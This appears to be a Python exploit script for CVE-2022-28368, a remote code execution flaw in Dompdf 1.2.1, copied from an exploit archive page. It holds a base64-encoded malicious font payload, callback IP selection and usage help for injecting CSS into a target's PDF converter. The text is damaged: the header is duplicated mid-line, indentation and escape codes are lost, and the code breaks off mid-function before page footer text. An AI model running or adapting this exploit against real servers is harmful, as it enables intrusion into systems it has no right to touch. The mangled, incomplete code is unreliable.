#!/usr/bin/python3
# Exploit Title: Dompdf 1.2.1 - Remote Code Execution (RCE)
# Date: 16 February 2023
# Exploit Author: Ravindu Wickramasinghe (@rvizx9)
# Vendor Homepa #!/usr/bin/python3
# Exploit Title: Dompdf 1.2.1 - Remote Code Execution (RCE)
# Date: 16 February 2023
# Exploit Author: Ravindu Wickramasinghe (@rvizx9)
# Vendor Homepage: https://dompdf.github.io/
# Software Link: https://github.com/dompdf/dompdf
# Version: <1.2.1
# Tested on: Kali linux
# CVE : CVE-2022-28368
# Github Link : https://github.com/rvizx/CVE-2022-28368
import subprocess
import re
import os
import sys
import curses
import requests
import base64
import argparse
import urllib.parse
from urllib.parse import urlparse
def banner():
print('''
33[2mCVE-2022-28368 33[0m - Dompdf RCE 33[2m PoC Exploit
33[0mRavindu Wickramasinghe 33[2m | rvz - @rvizx9
https://github.com/rvizx/ 33[0mCVE-2022-28368
''')
exploit_font = b"AAEAAAAKAO+/vQADACBkdW0xAAAAAAAAAO+/vQAAAAJjbWFwAAwAYAAAAO+/vQAAACxnbHlmNXNj77+9AAAA77+9AAAAFGhlYWQH77+9UTYAAADvv70AAAA2aGhlYQDvv70D77+9AAABKAAAACRobXR4BEQACgAAAUwAAAAIbG9jYQAKAAAAAAFUAAAABm1heHAABAADAAABXAAAACBuYW1lAEQQ77+9AAABfAAAADhkdW0yAAAAAAAAAe+/vQAAAAIAAAAAAAAAAQADAAEAAAAMAAQAIAAAAAQABAABAAAALe+/ve+/vQAAAC3vv73vv73vv73vv70AAQAAAAAAAQAKAAAAOgA4AAIAADMjNTowOAABAAAAAQAAF++/ve+/vRZfDzzvv70ACwBAAAAAAO+/vRU4BgAAAADvv70m270ACgAAADoAOAAAAAYAAQAAAAAAAAABAAAATO+/ve+/vQASBAAACgAKADoAAQAAAAAAAAAAAAAAAAAAAAIEAAAAAEQACgAAAAAACgAAAAEAAAACAAMAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEADYAAwABBAkAAQACAAAAAwABBAkAAgACAAAAAwABBAkAAwACAAAAAwABBAkABAACAAAAcwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="
def get_ip_addresses():
output = subprocess.check_output(['ifconfig']).decode()
ip_pattern = r'd{1,3}.d{1,3}.d{1,3}.d{1,3}'
ip_addresses = re.findall(ip_pattern, output)
ip_addresses = [ip for ip in ip_addresses if not ip.startswith('255')]
ip_addresses = list(set(ip_addresses))
ip_addresses.insert(0, 'localhost')
return ip_addresses
def choose_ip_address(stdscr, ip_addresses):
curses.curs_set(0)
curses.noecho()
stdscr.keypad(True)
current_row = 0
num_rows = len(ip_addresses)
stdscr.addstr("[ins]: please select an ip address, use up and down arrow keys, press enter to select.
")
while True:
stdscr.clear()
stdscr.addstr("[ins]: please select an ip address, use up and down arrow keys, press enter to select.
")
for i, ip_address in enumerate(ip_addresses):
if i == current_row:
stdscr.addstr(ip_address, curses.A_REVERSE)
else:
stdscr.addstr(ip_address)
stdscr.addstr("
")
key = stdscr.getch()
if key == curses.KEY_UP and current_row > 0:
current_row -= 1
elif key == curses.KEY_DOWN and current_row < num_rows - 1:
current_row += 1
elif key == curses.KEY_ENTER or key in [10, 13]:
return ip_addresses[current_row]
def help():
print('''
usage:
./dompdf-rce --inject <css-inject-endpoint> --dompdf <dompdf-instance>
example:
./dompdf-rce --inject https://vuln.rvz/dev/convert-html-to-pdf?html= --dompdf https://vuln.rvz/dompdf/
notes:
- Provide the parameters in the URL (regardless the request method)
- Known Issues! - Testing with https://github.com/positive-security/dompdf-rce
The program has been successfully tested for RCE on some systems where dompdf was implemented,
But there may be some issues when testing with the dompdf-rce PoC at https://github.com/positive-security/dompdf-rce
due to a known issue described at https://github.com/positive-security/dompdf-rce/issues/2.
In this application, the same implementation was added for now.
Although it may be pointless at the moment, you can still manually add the payload
by copying the exploit_font.php file to ../path-to-dompdf-rce/dompdf/applicaiton/lib/fonts/exploitfont_normal_3f83639933428d70e74a061f39009622.php
- more : https://www.cve.org/CVERecord?id=CVE-2022-28368
''')
sys.exit()
def check_url(url):
regex = re.compile(
r'^(?:http|ftp)s?://'
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?.)+(?:[A-Z]{2,6}.?|[A-Z0-9-]{2,}.?)|'
r'localhost|'
r'd{1,3}.d{1,3}.d{1,3}.d{1,3})'
r'(?::d+)?'
r'(?:/?|[/?]S+)$', re.IGNORECASE)
if not re.match(regex, url):
print(f"
Dompdf 1.2.1 Remote Code Execution
- Details
- Written by: khalil
- Category: Vulnerabilities
- Hits: 124